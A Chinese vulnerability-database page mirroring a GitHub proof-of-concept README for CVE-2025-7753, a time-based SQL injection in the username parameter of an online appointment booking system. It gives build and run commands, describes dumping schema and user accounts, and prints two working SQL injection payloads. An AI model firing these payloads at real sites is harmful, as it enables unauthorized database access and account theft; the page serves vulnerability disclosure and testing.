漏洞平台

POC详情： cb78f6c3e59c462287c7b0686c34bc2ad43f9b16

来源

https://github.com/byteReaper77/CVE-2025-7753

关联漏洞

标题： Code-Projects Online Appointment Booking System 注入漏洞 (CVE-2025-7753)
描述：Code-Projects Online Appointment Booking System是Code-Projects开源的一个网上预约系统。 Code-Projects Online Appointment Booking System 1.0版本存在注入漏洞，该漏洞源于文件/admin/adddoctor.php中参数Username处理不当导致SQL注入。

描述

PoC Exploit for CVE-2025-7753 — Time-Based SQL Injection in Online Appointment Booking System 1.0 via the username parameter. Exploit written in C using libcurl.

介绍

# 🚨 CVE-2025-7753 — SQL Injection PoC Exploit

**Author:** Byte Reaper  
**Telegram:** [@ByteReaper0](https://t.me/ByteReaper0)  
**CVE:** CVE‑2025‑7753  
**Vulnerability:** Unauthenticated, time‑based SQL Injection  

---

## 🔍 Overview

A critical SQL Injection vulnerability exists in **Online Appointment Booking System 1.0** (Code‑Projects) in the file  
`/admin/adddoctor.php`. The `username` parameter is not properly sanitized, allowing remote attackers to execute arbitrary SQL queries (time‑based, error‑based, union‑based, boolean‑based).

This repository provides the **first public PoC** written in C, leveraging **libcurl** for HTTP requests and ANSI‑colored output for clarity.

---

## ⚙️ Requirements

- **Operating System:** Linux (x86_64 recommended)  
- **Compiler:** GCC or Clang  
- **Dependencies:**  

  sudo apt update
  sudo apt install build-essential libcurl4-openssl-dev
🚀 Build & Run
Compile:

gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
Execute (as root):

sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
Verbose mode (optional):

sudo ./CODE_PROJECT -u http://TARGET/... -v
📜 Exploit Workflow
Environment checks ensure you’re on Linux and running as root (auto‑escalates via sudo if needed).

Payload array includes:

Time‑based (SLEEP(5))

Error‑based (RLIKE, CONCAT, COUNT)

UNION‑based queries to dump schema, user, table names, and first user account.

libcurl performs POST requests and captures server responses.

Response parsing scans for SQL error strings to confirm vulnerability.

🧪 Payloads Tested

11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz
11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm
… etc.

## License
MIT

文件快照


 [4.0K]  /data/pocs/cb78f6c3e59c462287c7b0686c34bc2ad43f9b16
├── [ 15K]  exploit.c
├── [1.0K]  LICENSE
└── [1.8K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。